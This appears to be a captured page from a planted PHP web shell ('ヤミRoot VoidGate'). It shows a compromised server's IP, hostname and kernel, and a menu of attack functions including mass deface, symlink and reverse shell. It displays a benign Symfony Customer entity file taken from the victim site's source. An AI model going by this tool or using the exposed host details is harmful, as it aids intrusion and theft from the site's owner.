ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Entity
/
Viewing: Customer.php
<?php namespace AppBundle\Entity; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; use Symfony\Component\Security\Core\User\UserInterface; use Symfony\Component\Security\Core\User\EquatableInterface; use Symfony\Bridge\Doctrine\Validator\Constraints\UniqueEntity; use JMS\Serializer\Annotation as JMS; /** * Customer * @ORM\Entity(repositoryClass="AppBundle\Repository\CustomerRepository") */ class Customer extends BaseUser { /** * @var \AppBundle\Entity\Customer * * @ORM\OneToOne(targetEntity="AppBundle\Entity\Customer") * @Serializer\Groups({"CUSTOMER_DETAILS"}) */ private $createdBy; public function __construct() { parent::__construct(); $this->setRoles(array('ROLE_CUSTOMER')); } /** * Set createdBy * * @param \AppBundle\Entity\Customer $createdBy * * @return Customer */ public function setCreatedBy(\AppBundle\Entity\Customer $createdBy) { $this->createdBy = $createdBy; return $this; } /** * Get createdBy * * @return \AppBundle\Entity\Customer */ public function getCreatedBy() { return $this->createdBy; } }
Coded With 💗 by
0x6ick